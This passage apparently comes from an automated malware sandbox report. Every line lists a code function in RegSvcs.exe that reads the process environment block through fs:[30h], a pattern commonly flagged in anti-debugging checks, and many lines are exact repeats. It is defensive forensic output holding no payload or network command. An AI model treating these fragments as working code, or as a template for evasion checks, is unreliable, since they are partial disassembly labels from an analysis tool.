                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB47FB mov eax, dword ptr fs:[00000030h]7_2_00EB47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB47FB mov eax, dword ptr fs:[00000030h]7_2_00EB47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3E7E1 mov eax, dword ptr fs:[00000030h]7_2_00F3E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBC7C0 mov eax, dword ptr fs:[00000030h]7_2_00EBC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F307C3 mov eax, dword ptr fs:[00000030h]7_2_00F307C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB07AF mov eax, dword ptr fs:[00000030h]7_2_00EB07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F647A0 mov eax, dword ptr fs:[00000030h]7_2_00F647A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5678E mov eax, dword ptr fs:[00000030h]7_2_00F5678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB8770 mov eax, dword ptr fs:[00000030h]7_2_00EB8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0770 mov eax, dword ptr fs:[00000030h]7_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE674D mov esi, dword ptr fs:[00000030h]7_2_00EE674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE674D mov eax, dword ptr fs:[00000030h]7_2_00EE674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE674D mov eax, dword ptr fs:[00000030h]7_2_00EE674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3E75D mov eax, dword ptr fs:[00000030h]7_2_00F3E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0750 mov eax, dword ptr fs:[00000030h]7_2_00EB0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2750 mov eax, dword ptr fs:[00000030h]7_2_00EF2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2750 mov eax, dword ptr fs:[00000030h]7_2_00EF2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2C730 mov eax, dword ptr fs:[00000030h]7_2_00F2C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC720 mov eax, dword ptr fs:[00000030h]7_2_00EEC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC720 mov eax, dword ptr fs:[00000030h]7_2_00EEC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE273C mov eax, dword ptr fs:[00000030h]7_2_00EE273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE273C mov ecx, dword ptr fs:[00000030h]7_2_00EE273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE273C mov eax, dword ptr fs:[00000030h]7_2_00EE273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC700 mov eax, dword ptr fs:[00000030h]7_2_00EEC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0710 mov eax, dword ptr fs:[00000030h]7_2_00EB0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE0710 mov eax, dword ptr fs:[00000030h]7_2_00EE0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7A8E4 mov eax, dword ptr fs:[00000030h]7_2_00F7A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC8F9 mov eax, dword ptr fs:[00000030h]7_2_00EEC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC8F9 mov eax, dword ptr fs:[00000030h]7_2_00EEC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F808C0 mov eax, dword ptr fs:[00000030h]7_2_00F808C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0887 mov eax, dword ptr fs:[00000030h]7_2_00EB0887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3C89D mov eax, dword ptr fs:[00000030h]7_2_00F3C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3E872 mov eax, dword ptr fs:[00000030h]7_2_00F3E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3E872 mov eax, dword ptr fs:[00000030h]7_2_00F3E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F46870 mov eax, dword ptr fs:[00000030h]7_2_00F46870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F46870 mov eax, dword ptr fs:[00000030h]7_2_00F46870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4859 mov eax, dword ptr fs:[00000030h]7_2_00EB4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4859 mov eax, dword ptr fs:[00000030h]7_2_00EB4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE0854 mov eax, dword ptr fs:[00000030h]7_2_00EE0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5483A mov eax, dword ptr fs:[00000030h]7_2_00F5483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5483A mov eax, dword ptr fs:[00000030h]7_2_00F5483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED2835 mov eax, dword ptr fs:[00000030h]7_2_00ED2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED2835 mov eax, dword ptr fs:[00000030h]7_2_00ED2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED2835 mov eax, dword ptr fs:[00000030h]7_2_00ED2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED2835 mov ecx, dword ptr fs:[00000030h]7_2_00ED2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED2835 mov eax, dword ptr fs:[00000030h]7_2_00ED2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED2835 mov eax, dword ptr fs:[00000030h]7_2_00ED2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA830 mov eax, dword ptr fs:[00000030h]7_2_00EEA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3C810 mov eax, dword ptr fs:[00000030h]7_2_00F3C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3E9E0 mov eax, dword ptr fs:[00000030h]7_2_00F3E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE29F9 mov eax, dword ptr fs:[00000030h]7_2_00EE29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE29F9 mov eax, dword ptr fs:[00000030h]7_2_00EE29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7A9D3 mov eax, dword ptr fs:[00000030h]7_2_00F7A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F469C0 mov eax, dword ptr fs:[00000030h]7_2_00F469C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA9D0 mov eax, dword ptr fs:[00000030h]7_2_00EBA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA9D0 mov eax, dword ptr fs:[00000030h]7_2_00EBA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA9D0 mov eax, dword ptr fs:[00000030h]7_2_00EBA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA9D0 mov eax, dword ptr fs:[00000030h]7_2_00EBA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA9D0 mov eax, dword ptr fs:[00000030h]7_2_00EBA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA9D0 mov eax, dword ptr fs:[00000030h]7_2_00EBA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE49D0 mov eax, dword ptr fs:[00000030h]7_2_00EE49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F389B3 mov esi, dword ptr fs:[00000030h]7_2_00F389B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F389B3 mov eax, dword ptr fs:[00000030h]7_2_00F389B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F389B3 mov eax, dword ptr fs:[00000030h]7_2_00F389B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB09AD mov eax, dword ptr fs:[00000030h]7_2_00EB09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB09AD mov eax, dword ptr fs:[00000030h]7_2_00EB09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A0 mov eax, dword ptr fs:[00000030h]7_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54978 mov eax, dword ptr fs:[00000030h]7_2_00F54978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54978 mov eax, dword ptr fs:[00000030h]7_2_00F54978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED6962 mov eax, dword ptr fs:[00000030h]7_2_00ED6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED6962 mov eax, dword ptr fs:[00000030h]7_2_00ED6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED6962 mov eax, dword ptr fs:[00000030h]7_2_00ED6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3C97C mov eax, dword ptr fs:[00000030h]7_2_00F3C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F30946 mov eax, dword ptr fs:[00000030h]7_2_00F30946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84940 mov eax, dword ptr fs:[00000030h]7_2_00F84940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3892A mov eax, dword ptr fs:[00000030h]7_2_00F3892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F4892B mov eax, dword ptr fs:[00000030h]7_2_00F4892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3C912 mov eax, dword ptr fs:[00000030h]7_2_00F3C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8918 mov eax, dword ptr fs:[00000030h]7_2_00EA8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8918 mov eax, dword ptr fs:[00000030h]7_2_00EA8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E908 mov eax, dword ptr fs:[00000030h]7_2_00F2E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E908 mov eax, dword ptr fs:[00000030h]7_2_00F2E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEAAEE mov eax, dword ptr fs:[00000030h]7_2_00EEAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEAAEE mov eax, dword ptr fs:[00000030h]7_2_00EEAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0AD0 mov eax, dword ptr fs:[00000030h]7_2_00EB0AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F06ACC mov eax, dword ptr fs:[00000030h]7_2_00F06ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F06ACC mov eax, dword ptr fs:[00000030h]7_2_00F06ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F06ACC mov eax, dword ptr fs:[00000030h]7_2_00F06ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE4AD0 mov eax, dword ptr fs:[00000030h]7_2_00EE4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE4AD0 mov eax, dword ptr fs:[00000030h]7_2_00EE4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB8AA0 mov eax, dword ptr fs:[00000030h]7_2_00EB8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB8AA0 mov eax, dword ptr fs:[00000030h]7_2_00EB8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA80 mov eax, dword ptr fs:[00000030h]7_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA80 mov eax, dword ptr fs:[00000030h]7_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA80 mov eax, dword ptr fs:[00000030h]7_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA80 mov eax, dword ptr fs:[00000030h]7_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA80 mov eax, dword ptr fs:[00000030h]7_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA80 mov eax, dword ptr fs:[00000030h]7_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA80 mov eax, dword ptr fs:[00000030h]7_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA80 mov eax, dword ptr fs:[00000030h]7_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA80 mov eax, dword ptr fs:[00000030h]7_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84A80 mov eax, dword ptr fs:[00000030h]7_2_00F84A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE8A90 mov edx, dword ptr fs:[00000030h]7_2_00EE8A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CA72 mov eax, dword ptr fs:[00000030h]7_2_00F2CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CA72 mov eax, dword ptr fs:[00000030h]7_2_00F2CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EECA6F mov eax, dword ptr fs:[00000030h]7_2_00EECA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EECA6F mov eax, dword ptr fs:[00000030h]7_2_00EECA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EECA6F mov eax, dword ptr fs:[00000030h]7_2_00EECA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5EA60 mov eax, dword ptr fs:[00000030h]7_2_00F5EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0A5B mov eax, dword ptr fs:[00000030h]7_2_00EC0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0A5B mov eax, dword ptr fs:[00000030h]7_2_00EC0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6A50 mov eax, dword ptr fs:[00000030h]7_2_00EB6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6A50 mov eax, dword ptr fs:[00000030h]7_2_00EB6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6A50 mov eax, dword ptr fs:[00000030h]7_2_00EB6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6A50 mov eax, dword ptr fs:[00000030h]7_2_00EB6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6A50 mov eax, dword ptr fs:[00000030h]7_2_00EB6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6A50 mov eax, dword ptr fs:[00000030h]7_2_00EB6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6A50 mov eax, dword ptr fs:[00000030h]7_2_00EB6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDEA2E mov eax, dword ptr fs:[00000030h]7_2_00EDEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EECA24 mov eax, dword ptr fs:[00000030h]7_2_00EECA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EECA38 mov eax, dword ptr fs:[00000030h]7_2_00EECA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED4A35 mov eax, dword ptr fs:[00000030h]7_2_00ED4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED4A35 mov eax, dword ptr fs:[00000030h]7_2_00ED4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3CA11 mov eax, dword ptr fs:[00000030h]7_2_00F3CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3CBF0 mov eax, dword ptr fs:[00000030h]7_2_00F3CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB8BF0 mov eax, dword ptr fs:[00000030h]7_2_00EB8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB8BF0 mov eax, dword ptr fs:[00000030h]7_2_00EB8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB8BF0 mov eax, dword ptr fs:[00000030h]7_2_00EB8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5EBD0 mov eax, dword ptr fs:[00000030h]7_2_00F5EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0BCD mov eax, dword ptr fs:[00000030h]7_2_00EB0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0BCD mov eax, dword ptr fs:[00000030h]7_2_00EB0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0BCD mov eax, dword ptr fs:[00000030h]7_2_00EB0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F64BB0 mov eax, dword ptr fs:[00000030h]7_2_00F64BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F64BB0 mov eax, dword ptr fs:[00000030h]7_2_00F64BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0BBE mov eax, dword ptr fs:[00000030h]7_2_00EC0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0BBE mov eax, dword ptr fs:[00000030h]7_2_00EC0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EACB7E mov eax, dword ptr fs:[00000030h]7_2_00EACB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5EB50 mov eax, dword ptr fs:[00000030h]7_2_00F5EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F82B57 mov eax, dword ptr fs:[00000030h]7_2_00F82B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F82B57 mov eax, dword ptr fs:[00000030h]7_2_00F82B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F82B57 mov eax, dword ptr fs:[00000030h]7_2_00F82B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F82B57 mov eax, dword ptr fs:[00000030h]7_2_00F82B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F46B40 mov eax, dword ptr fs:[00000030h]7_2_00F46B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F46B40 mov eax, dword ptr fs:[00000030h]7_2_00F46B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F58B42 mov eax, dword ptr fs:[00000030h]7_2_00F58B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7AB40 mov eax, dword ptr fs:[00000030h]7_2_00F7AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8B50 mov eax, dword ptr fs:[00000030h]7_2_00EA8B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F64B4B mov eax, dword ptr fs:[00000030h]7_2_00F64B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F64B4B mov eax, dword ptr fs:[00000030h]7_2_00F64B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDEB20 mov eax, dword ptr fs:[00000030h]7_2_00EDEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDEB20 mov eax, dword ptr fs:[00000030h]7_2_00EDEB20
